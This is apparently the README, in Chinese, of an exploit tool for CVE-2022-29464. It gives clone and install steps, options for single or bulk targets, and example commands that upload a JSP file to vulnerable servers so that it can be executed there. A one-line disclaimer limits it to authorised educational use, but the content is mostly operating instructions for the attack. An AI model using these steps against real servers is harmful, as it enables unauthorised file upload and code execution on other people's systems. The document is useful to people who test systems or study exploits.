此仓库包含用于利用 CVE-2022-29464 漏洞的脚本,该漏洞允许将文件上传到易受攻击的服务器。仅限在授权环境且用于教育目的。
# 从 GitHub 克隆仓库
git clone https://github.com/c1ph3rbyt3/CVE-2022-29464.git
cd CVE-2022-29464
pip install -r requirements.txt
脚本提供两种主要模式:
-f, --file:指定包含目标列表的文件。-t, --target:指定单个目标,格式为 HOST:端口 或 IP:端口。-j, --jsp_file:将要上传的 JSP 文件名(例如 uploader.jsp)。必需。主机文件必须包含目标列表,格式如下:
127.0.0.1:8080
example.com:443
192.168.1.1:8443
每行必须包含一个 IP 地址或主机名,后跟端口,用冒号 (:) 分隔。
uploader.jsp 文件此仓库中包含的 uploader.jsp 文件可以替换为其他文件,此处仅作为参考文件。仓库中的文件会被上传到服务器,用于测试上传和执行。
python CVE-2022-29464.py -t 192.168.1.1:8080 -j uploader.jsp
python CVE-2022-29464.py -f hosts.txt -j uploader.jsp
python CVE-2022-29464.py -h
创建者:C1ph3rByt3